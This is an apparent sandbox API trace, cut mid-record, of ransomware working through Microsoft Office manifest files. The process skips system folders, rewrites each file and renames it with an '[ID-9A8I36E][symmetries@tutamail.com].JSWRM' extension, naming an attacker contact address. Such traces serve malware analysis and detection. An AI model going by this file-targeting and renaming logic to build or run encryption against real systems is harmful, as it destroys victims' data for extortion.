lpUsedDefaultChar=0x0) returned 50 [0101.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0101.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x20d728, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 50 [0101.596] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0101.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0101.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0101.596] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0101.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 50 [0101.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0101.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0101.597] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0101.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.597] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=36750) returned 1 [0101.597] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.597] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8f80) returned 0x24d210 [0101.597] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8f80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x8f80, lpOverlapped=0x0) returned 1 [0101.601] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.601] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8f80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x8f80, lpOverlapped=0x0) returned 1 [0101.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.601] CloseHandle (hObject=0x45c) returned 1 [0101.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0101.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.601] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0101.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0101.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0101.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.602] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0101.602] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd31415cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd31415cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3298bbd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x180e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.groovemui.msi.16.en-us.xml", cAlternateFileName="C26024~1.XML")) returned 1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="...") returned 1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="windows") returned -1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="recovery") returned -1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="perflogs") returned -1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="documents and settings") returned -1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="system volume information") returned -1 [0101.603] lstrcmpiW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="msocache") returned -1 [0101.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0101.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.groovemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0101.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.groovemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.groovemui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 38 [0101.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0101.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0101.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.groovemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0101.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.groovemui.msi.16.en-us.xml", cchWideChar=38, lpMultiByteStr=0x22d298, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.groovemui.msi.16.en-us.xml", lpUsedDefaultChar=0x0) returned 38 [0101.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0101.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0101.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0101.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0101.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groovemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.604] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6158) returned 1 [0101.604] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1800) returned 0x205850 [0101.604] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1800, lpOverlapped=0x0) returned 1 [0101.606] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.606] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1800, lpOverlapped=0x0) returned 1 [0101.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0101.606] CloseHandle (hObject=0x45c) returned 1 [0101.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0101.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0101.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0101.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0101.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0101.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0101.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.607] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groovemui.msi.16.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.groovemui.msi.16.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.groovemui.msi.16.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0101.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0101.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0101.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0101.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0101.608] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd1ff851e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd1ff851e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd257bc65, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1979c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~2.XML")) returned 1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2=".") returned 1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="..") returned 1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="...") returned 1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="windows") returned -1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="recovery") returned -1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="perflogs") returned -1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="documents and settings") returned -1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="$RECYCLE.BIN") returned 1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="system volume information") returned -1 [0101.608] lstrcmpiW (lpString1="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2="msocache") returned -1 [0101.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0101.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0101.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x22d0a0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 46 [0101.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0101.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0101.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0101.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpUsedDefaultChar=0x0) returned 46 [0101.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0101.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0101.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0101.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0101.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0101.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0101.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0101.610] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=104348) returned 1 [0101.610] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19790) returned 0x24d210 [0101.610] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x19790, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x19790, lpOverlapped=0x0) returned 1 [0101.648] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.648] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x19790, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x19790, lpOverlapped=0x0) returned 1 [0101.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0101.649] CloseHandle (hObject=0x45c) returned 1 [0101.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0101.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0101.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0101.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0101.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0101.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0101.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0101.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0101.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0101.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0101.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0101.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0101.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0101.649] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0101.649] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\integration\\c2rmanifest.lync.lync.x-none.msi.16.x-none.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0101.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0101.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0101.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0101.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.651] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd31415cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd31415cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd32bedda, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5b94, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="C2RManifest.lyncmui.msi.16.en-us.xml", cAlternateFileName="C2FCD6~1.XML")) returned 1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2=".") returned 1 [0101.651] lstrcmpiW (lpString1="C2RManifest.lyncmui.msi.16.en-us.xml", lpString2="..") returned 1 [0101.651] 